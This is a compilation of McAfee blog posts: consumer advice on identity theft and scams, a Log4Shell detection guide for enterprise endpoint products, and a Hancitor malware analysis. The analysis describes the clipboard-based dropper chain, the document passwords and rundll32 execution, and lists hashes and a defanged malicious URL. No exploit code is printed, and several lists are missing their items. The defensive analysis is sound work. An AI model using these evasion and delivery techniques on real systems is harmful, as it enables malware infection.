Another idea is to place a one-year fraud alert on your credit reports to keep people from opening new accounts in your name. This encourages creditors and lenders to take extra precautions to verify your identity before granting any loans or credit increases. You can also place a security freeze on your credit report, which blocks others from accessing it to extend credit.
This might not seem like a real form of identity theft, but it happens. Medical identity theft is when a criminal poses as another person to obtain health care services. In fact, fraudsters may use your name and insurance information to:
This can result in you having bills for prescriptions, services, or devices you didn’t need, ask for, or even receive. Your health care and insurance records may even have these things added to them. An inaccurate medical record can make it harder for you to get the care you need in the future and even impact insurance coverage.
Fortunately, you can help minimize the risk of medical identity theft by regularly reviewing your medical claims. Contact your insurer if you see unfamiliar procedures, prescriptions, or services. You’ll also want to let your health care provider know so that they can ensure your medical files are correct. Finally, consider filing a complaint with the U.S. Department of Health and Human Services (HHS).
Criminal identity theft occurs when a person arrested by law enforcement uses someone else’s name instead of providing theirs. They might be able to pass this off by creating a fake ID or using a stolen ID, like your driver’s license, to show to the police. This type of fraud can be difficult to detect until the consequences are evident, like:
You can help protect yourself against criminal identity theft by safeguarding your ID. If your license or state-issued ID is lost or stolen, report it to the local Department of Motor Vehicles (DMV) and law enforcement. Also, limit the information you share online (and encourage family members to do the same). For example, if your teen got their first driver’s license and wants to share a pic of it on social media, explain why this isn’t a good idea.
As one of the fastest-growing types of financial crime in the U.S., synthetic identity theft involves creating fake identities using real people’s information. Fraudsters may use data like birthdates, addresses, and Social Security numbers from real people, blending them to create a fake profile. They can then use this persona to apply for loans or credit cards or commit other financial crimes. Kids and older adults tend to be vulnerable to this type of fraud since they rarely use their SSNs.
The most important thing about synthetic identity theft is knowing the signs and acting fast. Keep an eye out for any mail with your address on it but addressed to a different name and phone calls or mail about new credit accounts. You can further protect yourself by regularly checking your credit reports for unexplained changes and placing a security freeze on them.
There are also identity monitoring services available, which scan the internet, including the dark web, for breached Social Security numbers. If you suspect you or a loved one is the victim of synthetic identity theft, contact the relevant financial institutions to alert them.
We all want to protect our children from bad actors, especially when it comes to identity theft. Child identity theft involves using a minor’s information to commit financial fraud, like opening a new account or line of credit under the child’s name. The thief may even use the child’s identity to get a driver’s license, apply for government benefits, or buy a house. This is often easier than targeting an adult because most kids don’t have credit reports or financial accounts, making them a clean slate.
Unfortunately, child identity theft is often perpetrated within the family by a relative who has access to the child’s data like their birthdate and address. And many children don’t realize they’ve been targeted until they’re older — for example, when they try to take out a student loan. By this point, the issue may have been escalating for years. So, it’s important as a parent to be aware of child identity theft.
The best way to do this is to check whether your child has a credit report with any of the three big credit bureaus (TransUnion, Equifax, and Experian). If so, review the report and report any fraudulent activity. You can also place a freeze on your child’s credit report to help minimize the risk of future fraud.
No one wants to be left in the dark when it comes to identity theft, so knowing the signs can help you spot it and take action quickly. This can help stop fraud in its tracks, minimizing both immediate damage and long-term repercussions. Some warning signs that may indicate identity theft include:
You can also increase your odds of recognizing identity theft with tools like McAfee’s identity protection services. Our continual monitoring can keep tabs on over 60 types of personal information, which allows us to quickly identify security issues, alerting you to potential breaches so that you can fix them. We’ll also notify you up to 10 months sooner than similar services. By combining the best practices described above with a comprehensive identity protection service, you can worry less about identity theft and spend more time enjoying the internet.
The internet makes daily life easier in many ways. You can now learn, work, play, and shop online. You shouldn’t have to forego these conveniences because of the threat of identity theft.
McAfee’s identity theft protection services can help keep you and your loved ones safe. McAfee uses extensive monitoring and an early detection system to notify you of potential risks or breaches. You’ll also have access to 24/7 online security experts and up to $1 million of identity theft coverage. Get the peace of mind you need to continue using the internet with confidence.
The post 5 Common Types of Identity Theft appeared first on McAfee Blog.
By Guilherme Venere, Ismael Valenzuela, Carlos Diaz, Cesar Vargas, Leandro Costantino, Juan Olle, Jose Luis Sanchez Martinez, AC3 Team
Collaborators: ATR Team (Steve Povolny, Douglas McKee, Mark Bereza), Frederick House (FireEye), Dileep Kumar Jallepalli (FireEye)
In this post we want to show how an endpoint solution with performant memory scanning capabilities can effectively detect active exploitation scenarios and complement network security capabilities your company has implemented.
As it is becoming the norm lately, a new vulnerability affecting a widely used library was recently released just in time for the Holidays. As detailed in our ATR blog, CVE-2021-44228 reported a vulnerability in the Log4J Java library affecting applications and web sites using the library to perform logging.
This vulnerability allows an attacker to coerce the vulnerable site or application to load and execute a malicious Java code from an untrusted remote location. Attack vectors are varied but the most common is associated with the attacker sending crafted strings as part of a network protocol to the target machine, like for example a modified HTTP Header sent as part of a POST request.
That is the reason many defenders are focusing their efforts on detecting the malicious strings through the network traffic. However, network signatures can be bypassed and there are reports confirming threat actors are adapting their network attacks with various forms of obfuscation to defeat network scanning. The following image shows some of the current obfuscation techniques that have been observed or reported related to this attack.
Source: https://github.com/mcb2Eexe/Log4j2-Obfucation
This doesn’t mean that network protection solutions are not useful against this attack. Network security platforms provide a first layer of defense and should be used as part of a defensible security architecture (security risk treatment strategy), augmented by additional layers of protection, detection, visibility, and response. Modern endpoint solutions are uniquely positioned to complement network-based capabilities with in-depth host-based visibility of system processes, like in-memory scanning and rapid response orchestration. This combination results in a robust defense against threats like Log4Shell.
To understand how memory scanning can help complement the network security platforms after a connection arrives to the endpoint and defeating the obfuscation layers, let’s take a look at the diagram below, describing the flow of execution for a common web based Log4J attack.
Let’s outline what happens:
In Step 1, an attacker sends a specially crafted string to the web server hosting the vulnerable application. This string, as we have seen, can be obfuscated to bypass network-based signatures.
In Step 2, the application proceeds to de-obfuscate this string to load it in memory. Once loaded into memory, the application initiates a LDAP connection to request the address of where the malicious class is located.
In Step 3, the attacker-controlled LDAP server responds with the location of the malicious Class file by indicating the HTTP URL address of where it is hosted.
In Step 4, the vulnerable application will proceed to initiate a download for that malicious class file.
In Step 5, the vulnerable application will load and run the malicious class file from step 4.
At this moment, the attacker achieves code execution on the target, leaving traces that may provide visibility on this activity for the defender. For example, spawning additional processes or touching files and registry keys after an exploitation
With this in mind, let’s imagine we could trigger a memory scan at some point in this execution flow to detect the presence of the malicious code. In general, scanning the memory of an endpoint is expensive from a processing perspective, therefore it’s not something that can be done continuously or even very often, but under specific circumstances it can be achieved with precision.
So, suppose we could trigger a memory scan at any point after step (2). We would have a high probability to find the de-obfuscated string used within the process memory at that time. If the memory is scanned after the malicious class file is downloaded, that content would also be available for scanning in its de-obfuscated form.
Such possibilities make the memory signature performant, and efficient, given the timing of the detection mainly depends on the trigger used to start the memory scan.
These technical capabilities are possible in ENS, let us show you how to do that!
In ENS (Endpoint Security) 10.7 update 4 and above, there is a powerful security feature available to every defender, and WE absolutely love it, which is the ability to trigger a memory scan from an Expert Rule.
We have talked about Expert Rules before, these are customizable access control rules which the end-user uses to detect suspicious activity not commonly seen by other scanners. McAfee Enterprise also provides community Expert Rules mapped to the MITRE ATT&CK Matrix through our public GitHub.
The feature we are interested in now is the ability to trigger a memory scan when an Expert Rule fires. That would allow us to target the applications vulnerable to Log4J and identify the moment they are being exploited.
Consider the following rule:
In the example rule above, we see a section defining ACTORS (inside the Process {…} section) and TARGETS (inside the Target {…} section). We define as actors any process that may be vulnerable to the Log4J exploit. In this case JAVA.EXE for standalone Java applications and TOMCAT?.EXE for Apache web-based applications. Either of these processes need to load both JAVA.DLL and JVM.DLL to ensure the Java runtime is active.
In the target section we add any potential payload of the attack. As Expert Rules are not focused on network traffic, we need to focus on the last step of the execution flow, which is when the payload is executed. Additional triggers like files or registry keys accessed can be added as more information about exploits become available. We may also have in this section any exclusion of valid behavior as shown in the example above with the “Exclude” on command line parameter. This exclusion is something customers can tailor to their environment to avoid false positives.
This expert rule will trigger when any ACTOR process spawns any of the TARGET payloads. If the rule were just that, one could see it would not be too effective in detecting the exploit and would probably cause many false positives.
But notice this line at the beginning of the rule:
This instruction tells ENS 10.7 to initiate a memory scan against the ACTOR process which caused the expert rule to trigger, and only that process. Now we have a reliable trigger for a performant memory scan, avoiding the performance issues of a blind memory scan, and it is done at a time very close to the initial exploitation attempt, which guarantees the de-obfuscated string will be in memory.
The second part of this solution is executed by the AV DAT Engine when it scans the memory of the process which triggered the Expert Rule. Once this string is found, a detection will occur on the affected process, and the action configured in the Expert Rule REACTION line will be applied. More information about available actions are described in KB95901 – McAfee Enterprise coverage for Apache Log4j CVE-2021-44228 Remote Code Execution. Note we recommend customers to use the REPORT action initially until they have sorted out what processes they need to monitor.
The first event highlighted above is the Expert Rule triggering for a suspicious process spawning from JAVA.EXE, and the second shows the AV DAT detection indicating the memory of that process had signatures of the exploit.
Note:
IF only the Expert Rule detection was present and NOT the JNDI/Log4J-Exploit event, it would indicate a program has executed children processes considered suspicious, and customers are advised to review the event and improve the Expert Rule accordingly.
However, IF, both the Expert Rule and JNDI/Log4j-Exploit events are triggered for the same program, we have confidently detected the presence of the process being exploited.
McAfee Enterprise provides more information about our current coverage for Log4J vulnerability in KB95901 – McAfee Enterprise coverage for Apache Log4j CVE-2021-44228 Remote Code Execution. This article contain links to download the Expert Rule and the associated EXTRA.DAT, as well as details on how to set up ePO to use them in your environment.
Customers who want to implement this solution are invited to review the instructions in the KB and associated documentation. It is highly recommended to review the Expert Rule and customize it to your environment.
To protect an environment against attacks like LOG4J, a layered strategy comprised of network security coupled by targeted endpoint memory scans allows defenders to effectively detect and prevent the attack execution flow against vulnerable systems exposed via network vectors.
Our ENS Expert Rules and Custom Scan reactions are designed to enable defenders with such capabilities so they can apply precise countermeasures against these emerging threats.
The post Log4J and The Memory That Knew Too Much appeared first on McAfee Blog.
Last week, I waved my 18-year-old off as he embarked on the Aussie school leaver’s rite of passage – Schoolies!! A week spent kicking up your heels and living life to the max without any parental supervision at all! Oh, the sleepless nights many of us parents have had! And once Christmas and New Year celebrations are done, he’ll be heading away to University to ‘live his best life’ away from his dedicated cyber mother!
And of course, I’m delighted for him, although secretly devastated to be losing my baby boy. But it does prompt the question, am I now done with cyber parenting? Is my work here officially done?
I remember when my kids were little, my mother shared some words of wisdom with me: ‘Alex, you never stop being a parent. The kids are the same, it’s just the issues that change.’ And she was so right. As our boys have grown up, we’ve been less involved in their day-to-day needs but still very much needed. Whether it’s to help review a work contract, provide advice on an issue with a flatmate or help pick out a suit, the parenting hasn’t stopped instead entered a new chapter. And of course, there’s no doubt that having interested, devoted parents at the end of the telephone – day or night – makes navigating life so much easier!
And when it comes to their digital lives, it’s the same story. While we have no reason to be involved in their day-to-day online lives, we have definitely been called upon to help them troubleshoot situations from receiving inappropriate messages, identifying potential scams or managing terse exchanges. And, might I add, I have also proactively offered my advice on the appropriateness of pictures they have shared online – many times!!
So, after having managed 3 kids through this transition to early adulthood with another one currently underway, I thought I’d share with you some of my best strategies for ensuring their digital life is in good shape without micro-managing them!
Every few days, I’ll check out my boys’ socials. Not only does it give me a ‘feel’ for what’s happening in their lives – where they’ve been and who with – it also allows me to check they are making good decisions about what they share. There have been multiple times during this period where I have sent off a quick text suggesting they remove a photo or perhaps rephrase a comment! And while I know these texts aren’t always warmly received, in nearly all cases, they take my advice!
And it goes without saying that your ability to provide input to their digital lives will only happen if you don’t cross boundaries! So, never embarrass them. If you see something you don’t like, message them privately – do not workshop it on their Facebook page! And if you want to post a pic or video of them, always get their ‘ok’ first.
OK, security software probably won’t be top of their Christmas list, but knowing that they have comprehensive security software like McAfee’s Total Protection on their devices which works hard in the background to minimize threats and issues will give you real peace of mind. This year, I’m buying my older boys an air-fryer and frypans for Christmas. Why not continue the pragmatic theme and invest in some software for them too?
About 4 years ago, I set up a family Messenger Group and it’s now something I absolutely treasure. We share pics of our cats and dog, potential family holiday dates, funny photos, and videos, and relevant news stories – particularly during COVID. But the other thing I like to share is reminders about important ‘tech stuff’, like changing passwords, when to update their Apple software or details about scams that are doing the rounds. Whether it’s Whats App, Telegram, or my personal favorite, Messenger, I strongly recommend establishing a family group chat as an effective way of covering off key issues with your young adult kids.
With potential employers, partners, and even friends using Google to conduct their due diligence on you, digital reputation is everything. So, weaving constant reminders into conversations with your adult kids should still be a priority. Now, of course, some kids will instinctively ‘get this’ but others will need a few pointers. According to a 70% of employers use social media to screen candidates during the hiring process, and about 43% of employers use social media to check on current employees. So, why not encourage them to ‘Google’ themselves – and why not do yourself also? How you present online could mean the difference between being employed or unemployed!
So, if you have a school leaver in your family and you’re not sure whether your job is done, I’m here to confirm that you’ll still be required for a very long time! Whether they know it or not, our big kids will still continue to need a sprinkling of our wisdom and experience for years to come. And even though they may have fled the nest, remember you will always be one of their most influential role models. So, make sure your digital life is in good shape too because as American novelist James Baldwin shares: ‘Children have never been very good at listening to their elders, but they have never failed to imitate them.’
Till next time
Take care
The post So, Your Kids Have Left School. Do You Still Need To Worry About Their Online Safety? appeared first on McAfee Blog.
Protecting your devices with antivirus is a great start, yet it’s only one part of staying safer online. With the way scammers and thieves target people today, you need to protect yourself too—specifically your identity and privacy.
Threats have evolved over the years. While hackers still wage malware attacks on computers, tablets, and smartphones, the devices aren’t the ultimate target. You are. The personal and private information created and kept on your devices have tremendous value because scammers and thieves can use it to steal your identity, open credit cards in your name, and commit all kinds of identity theft and fraud.
Yet just as using antivirus protection can keep you safer online, using privacy and identity protection will keep you far safer still. Let’s look at how all three can work in concert.
Privacy protection focuses on keeping your information from getting into the hands of advertisers, cybercriminals, and data brokers who want to use it for their benefit. To boost your online privacy, consider a few thoughtful additions to your daily browsing, email, and social media routine.
First, think carefully about your social media habits. Do you post everything about your day and childhood, pin your location, and share photos of documents that include your full name, birthday, or address? You may want to consider cutting back on what you broadcast on the internet, especially if your account is public for anyone to view.
Unfortunately, while your friends and family may love your status updates, cybercriminals love them more. After only minutes of snooping, cybercriminals can glean enough personal details about you to impersonate you or target a social engineering attempt at you. To keep your private information more private, limit what you share on social media, pare down your follower and friend lists to only the closest people, and if your social media account platform supports it set your account to private.
One more way to protect your privacy is to use a virtual private network (VPN). A VPN allows you to remain far more anonymous online by shielding your location and device information, along with the data passing along your connection—which includes things like your passwords, account information, and other sensitive info.
A VPN offers further protection when you’re logged on to a public network, like those in coffee shops, libraries, and transportation hubs. Cybercriminals often lurk on non-password-protected Wi-Fi networks and eavesdrop on people paying bills or online shopping to steal their credentials.
However, criminals aren’t the only ones who intrude on your privacy. Online data brokers collect thousands of data points on millions of people, then post bits of that information for anyone to see and offer far more detailed information for a price.
Who buys this information? More legitimate purposes include people conducting background checks, journalists, law enforcement, and, largely, advertisers. With such in-depth information, advertisers can target highly specific audiences with their ads, all based on personal information that can include shopping habits from customer loyalty cards, health data from fitness apps, and information scraped from public social media posts—just to name a few of the umpteen sources they draw from.
Yet data brokers won’t discriminate. They’ll sell to scammers and thieves as well, who can then use that personal information to help them commit identity fraud and theft.
However, you can do something about this. Personal data cleanup can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It can also provide guidance on how you can remove your data from those sites and can even manage the removal for you. And because data brokers continually update their data, personal data cleanup will continue to monitor those sites and help you get your information removed should it crop up again.
In all, if you feel that your privacy shouldn’t be up for grabs, a personal data cleanup service can
Another form of protection focuses on keeping you safer from identity theft and fraud. Here, thieves will steal personal and account information to rack up charges on existing credit and debit cards, open entirely new accounts and lines of credit, or impersonating the victim themselves for employment, health insurance coverage, or to commit other crimes in someone else’s name.
A few forms of identity crime include:
This list provides just a few examples, yet in all its forms, identity crime can affect your finances, credit score, and ability to secure loans, a mortgage, or future credit cards.
One way to keep your identity secure is to guard your PII carefully. Never give out your Social Security Number unless it’s necessary—such for employment, opening bank and credit accounts, applying for public assistance, filing tax returns, or obtaining a driver’s license. While other businesses may ask you for your Social Security Number for identification purposes, you are not legally bound to provide it. You can ask to provide an alternate form. Also, never share it over email or text where it can be potentially intercepted.
Beyond your Social Security Number, you can take steps to protect the many other forms of personal information you have. An identity monitoring service can keep tabs on everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft. Likewise, credit monitoring can watch for unusual credit activity that could be an indicator of identity theft as well.
Should the unfortunate occur, identity theft & recovery coverage like ours can help you get back on track in several ways. First, it provides $1 million in identity theft coverage that covers travel expenses, legal fees, and stolen funds reimbursement. Additionally, it provides the assistance of a licensed identity theft recovery pro who can help you repair your identity and credit.
The third form of protection involves our devices, like computers, tablets, and phones—protecting them from both physical and digital threats.
The first step you can take is to use a password, PIN, facial recognition, or other form of lock to keep your devices safer in the event of loss or theft. With this protection, your device is effectively an open book, providing a thief with access to all manner of personal information, accounts, and apps.
Taking this protection a step further is learning to remotely locate your devices and then lock or wipe them. Many laptops and mobile devices offer location tracking services to help find a lost device—and yet others allow the owner to remotely lock or even wipe the contents of that device if they fear it’s lost for good or fallen into the wrong hands.
It’s all rather straightforward, and device manufacturers have put up helpful web pages that can walk you through the process:
Another good step you can take is to back up your files, whether with an online cloud service, a physical external drive, or both. By storing your files in the cloud, you can recover them quickly if your device is stolen and you have to remotely wipe its contents. Storing them on an external drive also lets you recover your files if your device is stolen, however, you’ll want to keep it in a secure location so that it can’t be stolen as well. Options include a fireproof safe where you keep other valuables or even a safe deposit box. The drawback is that you will have to back up files manually and regularly whereas cloud backup is practically automatic when you’re connected to the internet.
Another component of device security is defending against malicious software. Viruses and malware can make their way onto your devices through several avenues, including sketchy websites, dishonest downloads, phishing schemes, and clicking on ads. The challenge is that several of these avenues can look rather legitimate at first glance. Sophisticated hackers, scammers, and thieves have learned how to make their bogus websites and search results look like the real thing. One way you can prevent making a bad click or downloading an attachment loaded with malware is to use web advisor software that can protect you while you browse.
And finally, yes, antivirus is a must now just as it’s ever been. When kept up to date with the latest updates, it can prevent malware from getting onto your devices—plus scan, detect, and delete viruses and malware from your devices should they make their way onto them.
The threats out there are many, and they go beyond threats to your devices. Hackers, scammers, and thieves are quite interested in you. Your accounts, your personal information, and anything they can grab to commit theft or fraud. Protecting yourself today calls for not only protecting your devices but your privacy and identity too.
Comprehensive online protection software like ours covers all three—privacy, identity, and devices. It includes the protections mentioned above, plus dozens of features more such as ransomware coverage, credit freezes, security locks, and an online protection score that shows you just how safe you are, along with suggestions that can make you safer still.
In all, it gives you far more control over your privacy and personal information, control that should rest in your hands, and not in the hands of data brokers, hackers, scammers, and thieves.
The post Privacy, Identity, and Device Protection: Why You Need to Invest in All Three appeared first on McAfee Blog.
Before you take the fun-looking quiz that popped up in your social media feed, think twice. The person holding the answers may be a hacker.
Where people go, hackers are sure to follow. So it’s no surprise hackers have set up shop on social media. This has been the case for years, yet now social media-based crime is on the rise. In 2019, total reported losses to this type of fraud reached $134 million. But reported losses hit $117 million in just the first six months of 2020, according to the U.S. Federal Trade Commission (FTC).
Among these losses are cases of identity theft, where criminals use social media to gather personal information and build profiles of potential victims they can target. Just as we discussed in our recent blog, “Can thieves steal identities with only a name and address?” these bits of information are important pieces in the larger jigsaw puzzle that is your overall identity.
Let’s uncover these scams these crooks use so that you can steer clear and stay safe.
“What’s your spooky Halloween name?” or “What’s your professional wrestler name?” You’ve probably seen a few of those and similar quizzes in your feed where you use the street you grew up on, your birthdate, your favorite song, and maybe the name of a beloved first pet to cook up a silly name or some other result. Of course, these are pieces of personal information, sometimes the answer to commonly used security questions by banks and other financial institutions. (Like, what was the model of your first car?) With this info in hand, a hacker could attempt to gain access to your accounts.
Similarly, scammers will also post surveys with the offer of a gift card to a popular retailer. All you have to do is fork over your personal info. Of course, there’s no gift card coming. Meanwhile, that scammer now has some choice pieces of personal info that they can potentially use against you.
How to avoid them: Simply put, don’t take those quizzes and surveys online.
The list here is long. These include posts and direct messages about phony relief funds, grants, and giveaways—along with bogus business opportunities that run the gamut from thinly-veiled pyramid schemes and gifting circles to mystery shopper jobs. What they all have in common is that they’re run by scammers who want your information, money or both. If this sounds familiar, like those old emails about transferring funds for a prince in some faraway nation, it is. Many of these scams simply made the jump from email to social media platforms.
How to avoid them: Research any offer, business opportunity, or organization that reaches out to you. A good trick is to do a search of the organization’s name plus the term “scam” or “review” or “complaint” to see if anything sketchy comes up.
If there’s one government official that scammers like use to put a scare in you, it’s the tax collector. These scammers will use social media messaging (and other mediums like emails, texts, and phone calls) to pose as an official that’s either demanding back taxes or offering a refund or credit—all of which are bogus and all of which involve you handing over your personal info, money, or both.
How to avoid them: Delete the message. In the U.S., the IRS and other government agencies will never reach out to you in this way or ask you for your personal information. Likewise, they won’t demand payment via wire transfer, gift cards, or cryptocurrency like bitcoin. Only scammers will.
These are far more targeted than the scams listed above, because they’re targeted and often rely upon specific information about you and your family. Thanks to social media, scammers can gain access to that info and use it against you. One example is the “grandkid scam” where a hacker impersonates a grandchild and asks a grandparent for money. Similarly, there are family emergency scams where a bad actor sends a message that a family member was in an accident or arrested and needs money quickly. In all, they rely on a phony story that often involves someone close to you who’s in need or in trouble.
How to avoid them: Take a deep breath and confirm the situation. Reach out to the person in question or another friend or family member to see if there really is a concern. Don’t jump to pay right away.
This is one of the most targeted attacks of all—the con artist who strikes up an online relationship to bilk a victim out of money. Found everywhere from social media sites to dating apps to online forums, this scam involves creating a phony profile and a phony story to go with it. From there, the scammer will communicate several times a day, perhaps talking about their exotic job in some exotic location. They’ll build trust along the way and eventually ask the victim to wire money or purchase gift cards.
How to avoid them: Bottom line, if someone you’ve never met in person asks you for money online, it’s a good bet that it’s a scam. Don’t do it.
Now with an idea of the bad actors are up to out there, here’s a quick rundown of things you can do to protect yourself further from the social media scams they’re trying to pull.
Above and beyond what we’ve covered so far, some online protection basics can keep you safer still. Comprehensive online protection software will help you create strong, unique passwords for all your accounts, help you keep from clicking links to malicious sites, and prevent you from downloading malware. Moreover, it can provide you with identity protection services like ours, which keep your personal info private with around-the-clock monitoring of your email addresses and bank accounts with up to $1M of ID theft insurance.
Together, with some good protection and a sharp eye, you can avoid those identity theft scams floating around on social media—and get back to enjoying time spent online with your true family and friends.
The post Quizzes and Other Identity Theft Schemes to Avoid on Social Media appeared first on McAfee Blog.
Like many consumers around the world, you’re probably scouring the internet to find the perfect gifts for your friends and family in time for the holidays. While buyers prepare for the festivities, cybercriminals look for opportunities to scam shoppers with various tricks. In 2020, the FBI received over 17,000 complaints regarding goods that were never delivered, totaling losses of more than $53 million.1 And this year, it is anticipated that the number could increase due to rumors of merchandise shortages and the ongoing pandemic.
But no need to get your tinsel in a tangle! At McAfee, we’re empowering consumers to live their digital lives with confidence by providing tips and tools for sidestepping cyber-grinches. Here are the top scams to look out for this holiday season so you can be on your merry way:
Phishing may be one of the older tricks in the book, but it is still a favorite standby for cybercriminals as phishing tactics become more sophisticated. According to Bleeping Computer, scammers tend to target holiday shoppers with emails advertising big-ticket or hard-to-find items to entice them to click on a malicious link.2 For example, cybercriminals could send a phishing email promising a sweet deal —often referred to as the discount scam — on the latest gaming system. Jumping at the opportunity to score such a great gift for a low price, an unsuspecting holiday shopper might click on the link and swiftly hand over their credit card details. But instead of receiving the gaming system, they receive alerts of suspicious purchases from their bank — purchases that cybercriminals made with their credit card information.
During the holidays, many brands increase their online advertising to boost sales. However, cyber-grinches will likely take advantage of this trend by creating fake websites and ads impersonating companies that consumers know and love. For example, cybercriminals can create fake websites and ads promoting unrealistic discounts and bargains that look remarkably similar to an online retailer’s site. If a customer clicks on the fake website and makes a “purchase” by inputting their credit card information, the scammers will then be able to use this data to make fraudulent purchases elsewhere.
Many consumers rely on social media to stay up-to-date on the latest deals, and scammers are eagerly looking for ways to take advantage. To target holiday shoppers via Instagram, Facebook, TikTok, etc., criminals use fake social media posts offering vouchers, gift cards, freebies, and contests in the hopes that the user will click on the post and hand over their personal or financial information. Perhaps a user comes across a fake contest for a $1,000 Amazon gift card on Instagram — all they have to do is enter their login credentials to enter. Little do they know that this contest has been formulated by scammers and submitting their login for entry is just handing over their data for cyber-scrooges to exploit.
Criminals can also take advantage of shoppable social media posts to target holiday shoppers with advertisements for non-existent or counterfeit items. Today, 130 million Instagram users tap on shoppable posts to learn more about products every month. It’s likely that these users will also rely on shoppable posts to interact with products they’re interested in purchasing for holiday gifts.3
Cybercriminals can entice these users by creating fraudulent social media ads for products they don’t actually have. If an unsuspecting shopper purchases through the fake ad, their financial information will not only find its way into the hands of the scammer, but they also won’t receive what they initially paid for.
According to the Wall Street Journal, travel and charity scams also tend to spike around the holidays.4 Travel scams could show up in the form of an email stating that a booking has been canceled, sending you to a fake website where you’re asked to enter your credit card number to set up a new reservation. You could also receive an email directing you to a clone site offering deals on a house rental, flight, or hotel room that seems too good to be true — as long as you hold your reservation with a deposit.
Cybercriminals also know that consumers tend to make charitable donations around the holidays, and many are quick to take advantage. A charity scam might target victims via social media feeds, asking people to donate to a fake organization. Consumers should always do their research on a charity before they donate to prevent money from ending up in a scammer’s pocket.
To prevent cyber-grinches from stealing your money, data, and festive spirit, follow these tips so you can continue to make merry during the holiday shopping season:
The post 6 Tips to Protect Yourself From Holiday Shopping Scammers appeared first on McAfee Blog.
By Sriram P & Lakshya Mathur
Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method.
This blog focuses on the effectiveness of this newly observed technique and how it adds an extra layer of obfuscation to evade detection.
Below (Figure 1) is the Geolocation based stats of Hancitor Malicious Doc observed by McAfee since September 2021
Malware authors send the victims a phishing email containing a link as shown in the below screenshot (Figure 3). The usual Docusign theme is used in this recent Hancitor wave. This phishing email contains a link to the original malicious word document. On clicking the link, the Malicious Doc file is downloaded.
Since the macros are disabled by default configuration, malware authors try to lure victims into believing that the file is from legitimate organizations or individuals and will ask victims to enable editing and content to start the execution of macros. The screenshot below (Figure 4) is the lure technique that was observed in this current wave.
As soon as the victim enables editing, malicious macros are executed via the Document_Open function.
There is an OLE object embedded in the Doc file. The screenshot below (Figure 5) highlights the object as an icon.
The loader VBA function, invoked by document_open, calls this random function (Figure 6), which moves the selection cursor to the exact location of the OLE object using the selection methods (.MoveDown, .MoveRight, .MoveTypeBackspace). Using the Selection.Copy method, it will copy the selected OLE object to the clipboard. Once it is copied in the clipboard it will be dropped under %temp% folder.
When an embedded object is being copied to the clipboard, it gets written to the temp directory as a file. This method is used by the malware author to drop a malicious word document instead of explicitly writing the file to disk using macro functions like the classic FileSystemObject.
In this case, the file was saved to the %temp% location with filename name “zoro.kl” as shown in the below screenshot (Fig 8). Fig 7 shows the corresponding procmon log involving the file write event.
Using the CreateObject(“Scripting.FileSystemObject”) method, the malware moves the file to a new location \Appdata\Roaming\Microsoft\Templates and renames it to “zoro.doc”.
This file is then opened with the built-in document method, Documents.open. This moved file, zoro.doc, is password-protected. In this case, the password used was “doyouknowthatthegodsofdeathonlyeatapples?”. We have also seen the usage of passwords like “donttouchme”, etc.
This newly dropped doc is executed using the Documents.Open function (Figure 11).
Zoro.doc uses the same techniques to copy and drop the next payload as we saw earlier. The only difference is that it has a DLL as the embedded OLE object.
It drops the file in the %temp% folder using clipboard with the name “gelforr.dap”. Again, it moves gelforr.dap DLL file to \Appdata\Roaming\Microsoft\Templates (Figure 12).
Finally, after moving DLL to the templates folder, it is executed using Rundll32.exe by another VBA call.
MITRE ATT&CK
| Technique ID | Tactic | Technique details |
| T1566.002 | Initial Access | Spam mail with links |
| T1204.001 | Execution | User Execution by opening the link. |
| T1204.002 | Execution | Executing downloaded doc |
| T1218 | Defense Evasion | Signed Binary Execution Rundll32 |
| T1071 | C&C (Command & Control) | HTTP (Hypertext Transfer Protocol) protocol for communication |
IOC (Indicators Of Compromise)
| Type | SHA-256 | Scanner | Detection Name |
| Main Doc | 915ea807cdf10ea4a4912377d7c688a527d0e91c7777d811b171d2960b75c65c | WSS | W97M/Dropper.im |
| Dropped Doc | c1c89e5eef403532b5330710c9fe1348ebd055d0fe4e3ebbe9821555e36d408e | WSS | W97M/Dropper.im
|
| Dropped DLL | d83fbc9534957dd464cbc7cd2797d3041bd0d1a72b213b1ab7bccaec34359dbb | WSS | RDN/Hancitor |
| URLs (Uniform Resource Locator) | hxxp://mettlybothe.com/8/forum[.]php | WebAdvisor | Blocked |
The post HANCITOR DOC drops via CLIPBOARD appeared first on McAfee Blog.
Several security researchers have recently reported a powerful software bug that could potentially affect thousands of popular websites, services, hosted apps, and even game servers—thanks to an apparent flaw that could allow hackers to compromise or take control of servers that run them.
Just as reported by the developers of the popular Minecraft game, this flaw potentially affects servers that run Twitter, Apple’s iCloud, the Steam gaming platform, and a growing number of others that may be vulnerable.
One research group has dubbed the vulnerability as “Log4Shell,” and the name appears to be sticking. It involves a widely used software used to log information on servers. This software is open source, meaning it is freely available to developers. As a result, countless organizations and businesses use it on their servers.
While details are still evolving, researchers are acting with a proper degree of caution given the potential scope of the issue. Needless to say, the immediate level of concern remains high given the potential of the flaw to impact millions of servers, devices, and the people who use them.
At this early stage, a few things appear to be possible:
The developers of Minecraft have provided several steps that detail what both players and server hosts should do to protect themselves. The developers clearly recognize the potential gravity of the situation and are taking a proactive approach in saying, “This vulnerability poses a potential risk of your computer being compromised, and while this exploit has been addressed with all versions of the game client patched, you still need to take [steps] to secure your game and your servers.” We’ve provided the link to those steps here:
Recommended steps for Minecraft players and server hosts.
Right now, as this situation evolves, the best step is to keep your eyes open. If the app, service, site, or game you’re on performs strangely, consider signing out and closing it down. Then, perform a security scan on your device to check for viruses, malware, or other threats. Follow the guidance from your online protection software if any results come up.
You may also consider limiting your app and service usage to the most important activities. If it’s not an urgent or important online task or activity, see about putting it off until more is known.
Likewise, stay tuned. The details around this vulnerability continue to unfold. As they do, you’ll find further guidance that can help keep you and your family protected from this or any follow-on threats associated with this issue.
The post Concerned by the Security Risk Affecting Popular Services and Apps? Here’s What We Know. appeared first on McAfee Blog.
